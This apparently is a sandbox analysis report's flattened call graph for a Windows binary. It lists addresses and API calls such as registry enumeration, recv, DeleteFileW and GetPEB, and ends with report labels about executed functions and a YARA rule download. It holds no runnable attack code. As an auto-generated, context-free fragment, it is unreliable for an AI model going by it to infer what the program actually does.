14554->14555 14556 dbe813 14555->14556 14557 dc7a00 RtlAllocateHeap 14556->14557 14558 dbe82b 14557->14558 14559 db5c10 6 API calls 14558->14559 14560 dbe832 14559->14560 14561 db8580 RtlAllocateHeap 14560->14561 14562 dbe83e 14561->14562 14563 dbea8f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14562->14563 14564 dc7a00 RtlAllocateHeap 14562->14564 14563->14303 14565 dbeb19 14564->14565 14566 db5c10 6 API calls 14565->14566 14567 dbeb21 14566->14567 14744 dc83c0 14567->14744 14569 dbeb36 14570 dc8220 RtlAllocateHeap 14569->14570 14571 dbeb45 14570->14571 14572 dc7a00 RtlAllocateHeap 14571->14572 14573 dbed60 14572->14573 14574 db5c10 6 API calls 14573->14574 14575 dbed68 14574->14575 14576 dc83c0 RtlAllocateHeap 14575->14576 14577 dbed7d 14576->14577 14578 dc8220 RtlAllocateHeap 14577->14578 14581 dbed8c 14578->14581 14579 dbf699 shared_ptr 14579->14303 14580 dc80c0 RtlAllocateHeap 14580->14581 14581->14579 14581->14580 14582 dbf6cb 14581->14582 14583 dc7a00 RtlAllocateHeap 14582->14583 14584 dbf727 14583->14584 14585 db5c10 6 API calls 14584->14585 14586 dbf72e 14585->14586 14587 dc7a00 RtlAllocateHeap 14586->14587 14588 dbf741 14587->14588 14589 dc7a00 RtlAllocateHeap 14588->14589 14590 dbf756 14589->14590 14591 dc7a00 RtlAllocateHeap 14590->14591 14592 dbf76b 14591->14592 14593 dc7a00 RtlAllocateHeap 14592->14593 14594 dbf77d 14593->14594 14595 dbe530 13 API calls 14594->14595 14596 dbf786 14595->14596 14597 dc80c0 RtlAllocateHeap 14596->14597 14598 dbf7aa 14597->14598 14599 dc7a00 RtlAllocateHeap 14598->14599 14600 dbf7ba 14599->14600 14601 dc80c0 RtlAllocateHeap 14600->14601 14602 dbf7d7 14601->14602 14603 dc80c0 RtlAllocateHeap 14602->14603 14605 dbf7f0 14603->14605 14604 dbf982 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14604->14303 14605->14604 14606 dc7a00 RtlAllocateHeap 14605->14606 14607 dbfa04 14606->14607 14608 db5c10 6 API calls 14607->14608 14609 dbfa0b 14608->14609 14610 dc7a00 RtlAllocateHeap 14609->14610 14611 dbfa1e 14610->14611 14612 dc7a00 RtlAllocateHeap 14611->14612 14613 dbfa33 14612->14613 14614 dc7a00 RtlAllocateHeap 14613->14614 14615 dbfa48 14614->14615 14616 dc7a00 RtlAllocateHeap 14615->14616 14617 dbfa5a 14616->14617 14618 dbe530 13 API calls 14617->14618 14620 dbfa63 14618->14620 14619 dbfb35 shared_ptr 14619->14303 14620->14619 14621 dc7a00 RtlAllocateHeap 14620->14621 14622 dbfba5 14621->14622 14752 db9580 14622->14752 14624 dbfbb4 14767 db9230 14624->14767 14626 dbfbc3 14627 dc8320 RtlAllocateHeap 14626->14627 14628 dbfbdb 14627->14628 14628->14628 14629 dc80c0 RtlAllocateHeap 14628->14629 14630 dbfc8c 14629->14630 14631 dc7a00 RtlAllocateHeap 14630->14631 14632 dbfca7 14631->14632 14633 dc7a00 RtlAllocateHeap 14632->14633 14634 dbfcb9 14633->14634 14635 de6729 RtlAllocateHeap 14634->14635 14636 dbfce1 14635->14636 14637 dc7a00 RtlAllocateHeap 14636->14637 14638 dc05d4 14637->14638 14639 db5c10 6 API calls 14638->14639 14640 dc05db 14639->14640 14641 dc7a00 RtlAllocateHeap 14640->14641 14642 dc05f1 14641->14642 14643 dc7a00 RtlAllocateHeap 14642->14643 14644 dc0609 14643->14644 14645 dc7a00 RtlAllocateHeap 14644->14645 14646 dc0621 14645->14646 14647 dc7a00 RtlAllocateHeap 14646->14647 14648 dc0633 14647->14648 14649 dbe530 13 API calls 14648->14649 14651 dc063c 14649->14651 14650 dc0880 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14650->14303 14651->14650 14652 dc7a00 RtlAllocateHeap 14651->14652 14653 dc0987 14652->14653 14654 db5c10 6 API calls 14653->14654 14655 dc098e 14654->14655 14656 dc7a00 RtlAllocateHeap 14655->14656 14657 dc09a4 14656->14657 14658 dc7a00 RtlAllocateHeap 14657->14658 14659 dc09bc 14658->14659 14660 dc7a00 RtlAllocateHeap 14659->14660 14661 dc09d4 14660->14661 14662 dc7a00 RtlAllocateHeap 14661->14662 14663 dc12e0 14662->14663 14664 dbe530 13 API calls 14663->14664 14665 dc12e9 14664->14665 14667 dc85f6 14666->14667 14668 dc860b 14667->14668 14669 dc8f40 RtlAllocateHeap 14667->14669 14668->14311 14669->14668 14676 db8aea 14670->14676 14677 db89d8 shared_ptr 14670->14677 14671 dc7a00 RtlAllocateHeap 14671->14677 14672 db5c10 6 API calls 14672->14677 14673 db8b20 14675 dc8200 RtlAllocateHeap 14673->14675 14674 dc80c0 RtlAllocateHeap 14674->14677 14675->14676 14676->14317 14677->14671 14677->14672 14677->14673 14677->14674 14677->14676 14680 db5f47 14678->14680 14679 db5ffe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14679->14209 14680->14679 14681 dc80c0 RtlAllocateHeap 14680->14681 14682 db6089 14681->14682 14683 dc80c0 RtlAllocateHeap 14682->14683 14684 db60bd 14683->14684 14685 dc80c0 RtlAllocateHeap 14684->14685 14686 db60ee 14685->14686 14687 dc80c0 RtlAllocateHeap 14686->14687 14688 db611f 14687->14688 14689 dc80c0 RtlAllocateHeap 14688->14689 14690 db6150 RegOpenKeyExA 14689->14690 14691 db6493 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14690->14691 14694 db61a3 __cftof 14690->14694 14691->14209 14692 db6243 RegEnumValueA 14692->14694 14693 dc80c0 RtlAllocateHeap 14693->14694 14694->14691 14694->14692 14694->14693 14695 dc7a00 RtlAllocateHeap 14694->14695 14695->14694 14697 de667e __fassign 14696->14697 14699 de6685 __dosmaperr ___std_exception_copy 14697->14699 14700 dea8c3 14697->14700 14699->14512 14701 dea8cf __fassign 14700->14701 14704 dea967 14701->14704 14703 dea8ea 14703->14699 14705 dea98a 14704->14705 14707 dea9d0 ___free_lconv_mon 14705->14707 14708 ded82f 14705->14708 14707->14703 14711 ded83c __fassign 14708->14711 14709 ded867 RtlAllocateHeap 14710 ded87a __dosmaperr 14709->14710 14709->14711 14710->14707 14711->14709 14711->14710 14713 de6762 14712->14713 14715 de674d __dosmaperr ___std_exception_copy ___free_lconv_mon 14712->14715 14713->14715 14716 dea038 14713->14716 14715->14514 14717 dea050 14716->14717 14719 dea075 14716->14719 14717->14719 14720 df0439 14717->14720 14719->14715 14721 df0445 __fassign 14720->14721 14723 df044d __dosmaperr ___std_exception_copy 14721->14723 14724 df052b 14721->14724 14723->14719 14725 df054d 14724->14725 14727 df0551 __dosmaperr ___std_exception_copy 14724->14727 14725->14727 14728 defcc0 14725->14728 14727->14723 14729 defd0d 14728->14729 14730 de690a __fassign 5 API calls 14729->14730 14733 defd1c __cftof 14730->14733 14731 deb67d GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14731->14733 14732 dec719 5 API calls __fassign 14732->14733 14733->14731 14733->14732 14734 deffbc __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14733->14734 14734->14727 14736 dc86e0 14735->14736 14736->14736 14737 dc7760 RtlAllocateHeap 14736->14737 14738 dc86f9 14737->14738 14739 dc8f40 RtlAllocateHeap 14738->14739 14740 dc8714 14738->14740 14739->14740 14741 dc8f40 RtlAllocateHeap 14740->14741 14743 dc8769 14740->14743 14742 dc87b1 14741->14742 14742->14519 14743->14519 14745 dc7760 RtlAllocateHeap 14744->14745 14746 dc8439 14745->14746 14747 dc8f40 RtlAllocateHeap 14746->14747 14748 dc8454 14746->14748 14747->14748 14749 dc8f40 RtlAllocateHeap 14748->14749 14751 dc84a8 14748->14751 14750 dc84ee 14749->14750 14750->14569 14751->14569 14753 db95d4 14752->14753 14754 dc80c0 RtlAllocateHeap 14753->14754 14755 db961c 14754->14755 14756 dc7a00 RtlAllocateHeap 14755->14756 14766 db9635 shared_ptr 14756->14766 14757 db979f 14759 db97fe 14757->14759 14760 db98e0 14757->14760 14758 dc7a00 RtlAllocateHeap 14758->14766 14762 dc80c0 RtlAllocateHeap 14759->14762 14763 dc8200 RtlAllocateHeap 14760->14763 14761 db5c10 6 API calls 14761->14766 14764 db9834 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14762->14764 14763->14764 14764->14624 14765 dc80c0 RtlAllocateHeap 14765->14766 14766->14757 14766->14758 14766->14760 14766->14761 14766->14764 14766->14765 14768 db9284 14767->14768 14769 dc80c0 RtlAllocateHeap 14768->14769 14770 db92cc 14769->14770 14771 dc7a00 RtlAllocateHeap 14770->14771 14781 db92e5 shared_ptr 14771->14781 14772 db944f 14774 dc80c0 RtlAllocateHeap 14772->14774 14773 dc7a00 RtlAllocateHeap 14773->14781 14777 db94c6 shared_ptr 14774->14777 14775 db5c10 6 API calls 14775->14781 14776 db9543 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14776->14626 14777->14776 14779 dc8200 RtlAllocateHeap 14777->14779 14778 dc80c0 RtlAllocateHeap 14778->14781 14780 db9578 14779->14780 14781->14772 14781->14773 14781->14775 14781->14777 14781->14778 14783 db22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14782->14783 14784 dcc0fb 14783->14784 14784->14452 14786 db22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14785->14786 14787 dcc16f 14786->14787 14787->13759 14789 de8868 5 API calls 14788->14789 14790 de8bdc 14789->14790 14790->13828 14792 dc80c0 RtlAllocateHeap 14791->14792 14799 db4707 shared_ptr 14792->14799 14793 db4976 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14793->13942 14794 dc80c0 RtlAllocateHeap 14798 db4846 shared_ptr 14794->14798 14795 dc80c0 RtlAllocateHeap 14795->14799 14796 dc8f40 RtlAllocateHeap 14796->14798 14797 dc8f40 RtlAllocateHeap 14797->14799 14798->14793 14798->14794 14798->14796 14800 db4994 14798->14800 14799->14795 14799->14797 14799->14798 14799->14800 14801 dc80c0 RtlAllocateHeap 14800->14801 14802 db49f3 14801->14802 14803 dc80c0 RtlAllocateHeap 14802->14803 14804 db4a0c 14803->14804 14805 db4690 RtlAllocateHeap 14804->14805 14806 db4a99 shared_ptr 14805->14806 14806->13942 14807 dca210 14808 dca290 14807->14808 14820 dc71d0 14808->14820 14810 dca330 14840 db3840 14810->14840 14811 dca2cc 14811->14810 14828 dc7d50 14811->14828 14814 dca39e shared_ptr 14815 dcd3e2 RtlAllocateHeap 14814->14815 14817 dca4be shared_ptr 14814->14817 14816 dca45e 14815->14816 14848 db3ee0 14816->14848 14819 dca4a6 14821 dc7211 14820->14821 14822 dcd3e2 RtlAllocateHeap 14821->14822 14823 dc7238 14822->14823 14824 dc7446 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14823->14824 14825 dcd3e2 RtlAllocateHeap 14823->14825 14824->14811 14826 dc73bb __cftof 14825->14826 14854 db2ec0 14826->14854 14829 dc7dcb 14828->14829 14830 dc7d62 14828->14830 14831 db2480 RtlAllocateHeap 14829->14831 14832 dc7d9c 14830->14832 14833 dc7d6d 14830->14833 14835 dc7d7a 14831->14835 14834 dc7db9 14832->14834 14837 dcd3e2 RtlAllocateHeap 14832->14837 14833->14829 14836 dc7d74 14833->14836 14834->14810 14835->14810 14838 dcd3e2 RtlAllocateHeap 14836->14838 14839 dc7da6 14837->14839 14838->14835 14839->14810 14841 db38f6 14840->14841 14843 db385f 14840->14843 14841->14814 14842 db391b 14844 dc91e0 RtlAllocateHeap 14842->14844 14843->14841 14843->14842 14845 db38cd shared_ptr 14843->14845 14846 db3925 14844->14846 14847 dc7d50 RtlAllocateHeap 14845->14847 14846->14814 14847->14841 14849 db3f48 14848->14849 14850 db3f1e 14848->14850 14851 db3f58 14849->14851 14903 db2c00 14849->14903 14850->14819 14851->14819 14855 db2f7e GetCurrentThreadId 14854->14855 14856 db2f06 14854->14856 14857 db2fef 14855->14857 14858 db2f94 14855->14858 14859 dcc6ac GetSystemTimePreciseAsFileTime 14856->14859 14857->14824 14858->14857 14866 dcc6ac GetSystemTimePreciseAsFileTime 14858->14866 14860 db2f12 14859->14860 14861 db301e 14860->14861 14862 db2f1d 14860->14862 14863 dcc26a 6 API calls 14861->14863 14864 dcd3e2 RtlAllocateHeap 14862->14864 14868 db2f30 __Mtx_unlock 14862->14868 14865 db3024 14863->14865 14864->14868 14869 dcc26a 6 API calls 14865->14869 14867 db2fb9 14866->14867 14871 dcc26a 6 API calls 14867->14871 14872 db2fc0 __Mtx_unlock 14867->14872 14868->14865 14870 db2f6f 14868->14870 14869->14867 14870->14855 14870->14857 14871->14872 14873 dcc26a 6 API calls 14872->14873 14874 db2fd8 __Cnd_broadcast 14872->14874 14873->14874 14874->14857 14875 dcc26a 6 API calls 14874->14875 14876 db303c 14875->14876 14877 dcc6ac GetSystemTimePreciseAsFileTime 14876->14877 14885 db3080 shared_ptr __Mtx_unlock 14877->14885 14878 db31c5 14879 dcc26a 6 API calls 14878->14879 14880 db31cb 14879->14880 14881 dcc26a 6 API calls 14880->14881 14882 db31d1 14881->14882 14883 dcc26a 6 API calls 14882->14883 14892 db3193 __Mtx_unlock 14883->14892 14884 db31a7 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14884->14824 14885->14878 14885->14880 14885->14884 14887 db3132 GetCurrentThreadId 14885->14887 14886 dcc26a 6 API calls 14888 db31dd 14886->14888 14887->14884 14889 db313b 14887->14889 14889->14884 14890 dcc6ac GetSystemTimePreciseAsFileTime 14889->14890 14891 db315f 14890->14891 14891->14878 14891->14882 14891->14892 14894 dcbd4c 14891->14894 14892->14884 14892->14886 14897 dcbb72 14894->14897 14896 dcbd5c 14896->14891 14898 dcbb9c 14897->14898 14899 dccf6b _xtime_get GetSystemTimePreciseAsFileTime 14898->14899 14902 dcbba4 __Xtime_diff_to_millis2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14898->14902 14900 dcbbcf __Xtime_diff_to_millis2 14899->14900 14901 dccf6b _xtime_get GetSystemTimePreciseAsFileTime 14900->14901 14900->14902 14901->14902 14902->14896 14904 dcd3e2 RtlAllocateHeap 14903->14904 14905 db2c0e 14904->14905 14913 dcb847 14905->14913 14907 db2c42 14908 db2c49 14907->14908 14919 db2c80 14907->14919 14908->14819 14910 db2c58 14922 db2560 14910->14922 14912 db2c65 std::_Xinvalid_argument 14914 dcb854 14913->14914 14918 dcb873 Concurrency::details::_Reschedule_chore 14913->14918 14925 dccb77 14914->14925 14916 dcb864 14916->14918 14927 dcb81e 14916->14927 14918->14907 14933 dcb7fb 14919->14933 14921 db2cb2 shared_ptr 14921->14910 14923 de38af ___std_exception_copy RtlAllocateHeap 14922->14923 14924 db2597 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14923->14924 14924->14912 14926 dccb92 CreateThreadpoolWork 14925->14926 14926->14916 14928 dcb827 Concurrency::details::_Reschedule_chore 14927->14928 14931 dccdcc 14928->14931 14930 dcb841 14930->14918 14932 dccde1 TpPostWork 14931->14932 14932->14930 14934 dcb817 14933->14934 14935 dcb807 14933->14935 14934->14921 14935->14934 14937 dcca78 14935->14937 14938 dcca8d TpReleaseWork 14937->14938 14938->14934 14942 dc87d0 14943 dcd3e2 RtlAllocateHeap 14942->14943 14944 dc882a __cftof 14943->14944 14952 dc9bb0 14944->14952 14946 dc8854 14950 dc886c __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14946->14950 14956 db43f0 14946->14956 14951 dc88df 14953 dc9be5 14952->14953 14965 db2ce0 14953->14965 14955 dc9c16 14955->14946 14957 dcbedf InitOnceExecuteOnce 14956->14957 14958 db440a 14957->14958 14959 db4411 14958->14959 14960 de6cbb 4 API calls 14958->14960 14962 dcbe50 14959->14962 14961 db4424 14960->14961 15009 dcbd8b 14962->15009 14964 dcbe66 std::_Xinvalid_argument std::_Throw_future_error 14964->14951 14966 db2d1d 14965->14966 14967 dcbedf InitOnceExecuteOnce 14966->14967 14968 db2d46 14967->14968 14969 db2d51 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14968->14969 14970 db2d88 14968->14970 14974 dcbef7 14968->14974 14969->14955 14983 db2440 14970->14983 14975 dcbf03 14974->14975 14986 db2900 14975->14986 14977 dcbf23 std::_Xinvalid_argument 14978 dcbf6a 14977->14978 14979 dcbf73 14977->14979 14994 dcbe7f 14978->14994 14980 db2ae0 5 API calls 14979->14980 14982 dcbf6f 14980->14982 14982->14970 15004 dcb5d6 14983->15004 14985 db2472 14987 dc80c0 RtlAllocateHeap 14986->14987 14988 db294f 14987->14988 14989 db26b0 RtlAllocateHeap 14988->14989 14991 db2967 14989->14991 14990 db298d shared_ptr 14990->14977 14991->14990 14992 de38af ___std_exception_copy RtlAllocateHeap 14991->14992 14993 db29e4 14992->14993 14993->14977 14995 dccc31 InitOnceExecuteOnce 14994->14995 14997 dcbe97 14995->14997 14996 dcbe9e 14996->14982 14997->14996 15000 de6cbb 14997->15000 15001 de6cc7 __fassign 15000->15001 15002 de8bec __fassign 4 API calls 15001->15002 15003 de6cf6 15002->15003 15005 dcb5f1 std::_Xinvalid_argument 15004->15005 15006 de8bec __fassign 4 API calls 15005->15006 15008 dcb658 __fassign __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 15005->15008 15007 dcb69f 15006->15007 15008->14985 15010 db22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 15009->15010 15011 dcbd9f 15010->15011 15011->14964 15151 dcb92e 15152 dcb7b5 7 API calls 15151->15152 15153 dcb956 15152->15153 15154 dcb718 7 API calls 15153->15154 15155 dcb96f 15154->15155 14939 de6629 14940 de64c7 __fassign 2 API calls 14939->14940 14941 de663a 14940->14941 13095 de6a44 13096 de6a5c 13095->13096 13097 de6a52 13095->13097 13106 de698d 13096->13106 13099 deb655 DeleteFileW 13097->13099 13100 de6a59 13099->13100 13101 de6a76 13109 de68ed 13101->13109 13104 de6a8a ___free_lconv_mon 13114 de690a 13106->13114 13108 de699f 13108->13101 13180 de683b 13109->13180 13111 de6905 13111->13104 13112 deb655 DeleteFileW 13111->13112 13113 deb667 __dosmaperr 13112->13113 13113->13104 13115 de6921 13114->13115 13116 de692a 13114->13116 13115->13108 13116->13115 13120 deb5fb 13116->13120 13121 deb60e 13120->13121 13122 de6960 13120->13122 13121->13122 13128 def5ab 13121->13128 13124 deb628 13122->13124 13125 deb63b 13124->13125 13127 deb650 13124->13127 13125->13127 13163 dee6b1 13125->13163 13127->13115 13129 def5b7 __fassign 13128->13129 13130 def606 13129->13130 13133 de8bec 13129->13133 13130->13122 13132 def62b 13134 de8bf1 __fassign 13133->13134 13137 de8bfc ___std_exception_copy 13134->13137 13141 ded634 13134->13141 13148 de65ed 13137->13148 13138 ded867 RtlAllocateHeap 13139 ded87a __dosmaperr 13138->13139 13140 de8c2f __fassign 13138->13140 13139->13132 13140->13138 13140->13139 13144 ded640 __fassign 13141->13144 13142 ded69c __dosmaperr __fassign ___std_exception_copy 13142->13137 13143 de65ed __fassign 2 API calls 13147 ded82e __fassign 13143->13147 13144->13142 13144->13143 13145 ded867 RtlAllocateHeap 13146 ded87a __dosmaperr 13145->13146 13145->13147 13146->13137 13147->13145 13147->13146 13151 de64c7 13148->13151 13152 de64d5 __fassign 13151->13152 13153 de6520 13152->13153 13156 de652b 13152->13156 13153->13140 13161 dea302 GetPEB 13156->13161 13158 de6535 13159 de653a GetPEB 13158->13159 13160 de654a __fassign 13158->13160 13159->13160 13162 dea31c __fassign 13161->13162 13162->13158 13164 dee6bb 13163->13164 13167 dee5c9 13164->13167 13166 dee6c1 13166->13127 13170 dee5d5 __fassign ___free_lconv_mon 13167->13170 13168 dee5f6 13168->13166 13169 de8bec __fassign 4 API calls 13171 dee668 13169->13171 13170->13168 13170->13169 13172 dee6a4 13171->13172 13176 dea72e 13171->13176 13172->13166 13177 dea751 13176->13177 13178 de8bec __fassign 4 API calls 13177->13178 13179 dea7c7 13178->13179 13181 de6863 13180->13181 13186 de6849 __dosmaperr __fassign 13180->13186 13182 de686a 13181->13182 13184 de6889 __fassign 13181->13184 13182->13186 13187 de69e6 13182->13187 13185 de69e6 RtlAllocateHeap 13184->13185 13184->13186 13185->13186 13186->13111 13188 de69f4 13187->13188 13191 de6a25 13188->13191 13194 deb04b 13191->13194 13193 de6a05 13193->13186 13196 deb087 __dosmaperr 13194->13196 13197 deb059 __fassign 13194->13197 13195 deb074 RtlAllocateHeap 13195->13196 13195->13197 13196->13193 13197->13195 13197->13196 13242 dbe0c0 recv 13243 dbe122 recv 13242->13243 13244 dbe157 recv 13243->13244 13246 dbe191 13244->13246 13245 dbe2b3 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13246->13245 13251 dcc6ac 13246->13251 13258 dcc452 13251->13258 13253 dbe2ee 13254 dcc26a 13253->13254 13255 dcc292 13254->13255 13256 dcc274 13254->13256 13255->13255 13256->13255 13275 dcc297 13256->13275 13259 dcc4a8 13258->13259 13261 dcc47a __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13258->13261 13259->13261 13264 dccf6b 13259->13264 13261->13253 13262 dcc4fd __Xtime_diff_to_millis2 13262->13261 13263 dccf6b _xtime_get GetSystemTimePreciseAsFileTime 13262->13263 13263->13262 13265 dccf7a 13264->13265 13267 dccf87 __aulldvrm 13264->13267 13265->13267 13268 dccf44 13265->13268 13267->13262 13271 dccbea 13268->13271 13272 dccbfb GetSystemTimePreciseAsFileTime 13271->13272 13274 dccc07 13271->13274 13272->13274 13274->13267 13280 db2ae0 13275->13280 13279 dcc2bf std::_Xinvalid_argument 13279->13256 13292 dcbedf 13280->13292 13282 db2aff 13286 dcc1ff 13282->13286 13283 db2af4 __fassign 13283->13282 13284 de8bec __fassign 4 API calls 13283->13284 13285 de6cf6 13284->13285 13287 dcc20b __EH_prolog3_GS 13286->13287 13299 dc80c0 13287->13299 13289 dcc23d 13312 db26b0 13289->13312 13291 dcc252 13291->13279 13295 dccc31 13292->13295 13296 dccc3f InitOnceExecuteOnce 13295->13296 13298 dcbef2 13295->13298 13296->13298 13298->13283 13301 dc8104 13299->13301 13302 dc80de 13299->13302 13304 dc817d 13301->13304 13305 dc8158 13301->13305 13310 dc8169 13301->13310 13302->13289 13303 dc81f3 13306 db2480 RtlAllocateHeap 13303->13306 13309 dcd3e2 RtlAllocateHeap 13304->13309 13304->13310 13305->13303 13308 dcd3e2 RtlAllocateHeap 13305->13308 13307 dc81f8 13306->13307 13308->13310 13309->13310 13311 dc81d0 shared_ptr 13310->13311 13321 dc9270 13310->13321 13311->13289 13313 dc7a00 RtlAllocateHeap 13312->13313 13314 db2702 13313->13314 13315 db2725 13314->13315 13333 dc8f40 13314->13333 13317 dc8f40 RtlAllocateHeap 13315->13317 13319 db278e shared_ptr 13315->13319 13317->13319 13318 de38af ___std_exception_copy RtlAllocateHeap 13320 db284b shared_ptr ___std_exception_destroy __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13318->13320 13319->13318 13319->13320 13320->13291 13324 dcc1b9 13321->13324 13327 dcc123 13324->13327 13326 dcc1ca std::_Xinvalid_argument 13330 db22e0 13327->13330 13329 dcc135 13329->13326 13331 de38af ___std_exception_copy RtlAllocateHeap 13330->13331 13332 db2317 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13331->13332 13332->13329 13334 dc908e 13333->13334 13335 dc8f6b 13333->13335 13336 dc9270 RtlAllocateHeap 13334->13336 13339 dc8fdc 13335->13339 13340 dc8fb2 13335->13340 13337 dc9093 13336->13337 13338 db2480 RtlAllocateHeap 13337->13338 13344 dc8fc3 13338->13344 13343 dcd3e2 RtlAllocateHeap 13339->13343 13339->13344 13340->13337 13341 dc8fbd 13340->13341 13342 dcd3e2 RtlAllocateHeap 13341->13342 13342->13344 13343->13344 13345 dc90b8 13344->13345 13347 dc904c shared_ptr 13344->13347 13348 db2480 std::_Xinvalid_argument 13344->13348 13346 dcd3e2 RtlAllocateHeap 13345->13346 13346->13347 13347->13315 13349 de38af ___std_exception_copy RtlAllocateHeap 13348->13349 13350 db24c3 13349->13350 13350->13315 13351 dbc8e0 13352 dbc937 13351->13352 13357 dc8de0 13352->13357 13354 dbc94c 13355 dc8de0 RtlAllocateHeap 13354->13355 13356 dbc988 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13355->13356 13358 dc8f2f 13357->13358 13359 dc8e05 13357->13359 13360 dc9270 RtlAllocateHeap 13358->13360 13363 dc8e4c 13359->13363 13364 dc8e76 13359->13364 13361 dc8f34 13360->13361 13362 db2480 RtlAllocateHeap 13361->13362 13368 dc8e5d shared_ptr __cftof 13362->13368 13363->13361 13365 dc8e57 13363->13365 13367 dcd3e2 RtlAllocateHeap 13364->13367 13364->13368 13366 dcd3e2 RtlAllocateHeap 13365->13366 13366->13368 13367->13368 13368->13354 15110 db8780 15111 db8786 15110->15111 15112 de6729 RtlAllocateHeap 15111->15112 15113 db8793 15112->15113 15114 db87a6 15113->15114 15115 de67b7 5 API calls 15113->15115 15116 db87a0 15115->15116 15121 dbb1a0 15122 dbb1f2 15121->15122 15123 dc80c0 RtlAllocateHeap 15122->15123 15124 dbb233 15123->15124 15125 dc7a00 RtlAllocateHeap 15124->15125 15126 dbb2dd 15125->15126 15127 dbe500 15128 dbe525 15127->15128 15130 dbe509 15127->15130 15130->15128 15131 dbe360 15130->15131 15132 dbe370 __dosmaperr 15131->15132 15133 de8ab6 5 API calls 15132->15133 15134 dbe3ad 15133->15134 15135 dcc199 std::_Xinvalid_argument RtlAllocateHeap 15134->15135 15137 dbe4fe 15135->15137 15136 dbe525 15136->15130 15137->15136 15138 dbe360 6 API calls 15137->15138 15138->15137 13369 dc88e0 13370 dc8ac7 13369->13370 13372 dc8936 13369->13372 13381 dc91e0 13370->13381 13373 dc8ac2 13372->13373 13374 dc897c 13372->13374 13375 dc89a3 13372->13375 13376 db2480 RtlAllocateHeap 13373->13376 13374->13373 13377 dc8987 13374->13377 13379 dcd3e2 RtlAllocateHeap 13375->13379 13380 dc898d shared_ptr 13375->13380 13376->13370 13378 dcd3e2 RtlAllocateHeap 13377->13378 13378->13380 13379->13380 13382 dcc1b9 RtlAllocateHeap 13381->13382 13383 dc91ea 13382->13383 15012 dc79c0 15013 dc79e0 15012->15013 15013->15013 15014 dc80c0 RtlAllocateHeap 15013->15014 15015 dc79f2 15014->15015 15016 dc93e0 15017 dc93f5 15016->15017 15018 dc9433 15016->15018 15024 dcd111 15017->15024 15025 dcd121 15024->15025 15026 dc93ff 15025->15026 15035 dcd199 15025->15035 15026->15018 15028 dcd64e 15026->15028 15039 dcd621 15028->15039 15031 dcd0c7 15032 dcd0d7 15031->15032 15033 dcd17f 15032->15033 15034 dcd17b RtlWakeAllConditionVariable 15032->15034 15033->15018 15034->15018 15036 dcd1a7 SleepConditionVariableCS 15035->15036 15038 dcd1c0 15035->15038 15036->15038 15038->15025 15040 dcd637 15039->15040 15041 dcd630 15039->15041 15048 de98fa 15040->15048 15045 de988e 15041->15045 15044 dc9429 15044->15031 15046 de98fa RtlAllocateHeap 15045->15046 15047 de98a0 15046->15047 15047->15044 15051 de9630 15048->15051 15050 de992b 15050->15044 15052 de963c __fassign 15051->15052 15055 de968b 15052->15055 15054 de9657 15054->15050 15056 de96a7 15055->15056 15057 de9714 __fassign ___free_lconv_mon 15055->15057 15056->15057 15060 de96f4 ___free_lconv_mon 15056->15060 15061 deedf6 15056->15061 15057->15054 15058 deedf6 RtlAllocateHeap 15058->15057 15060->15057 15060->15058 15062 deee03 15061->15062 15064 deee0f __cftof __dosmaperr 15062->15064 15065 df500f 15062->15065 15064->15060 15066 df501c 15065->15066 15068 df5024 __dosmaperr __fassign ___free_lconv_mon 15065->15068 15067 deb04b __fassign RtlAllocateHeap 15066->15067 15067->15068 15068->15064

                                                        Executed Functions

                                                        Function 00DBBE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 313networksleepfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
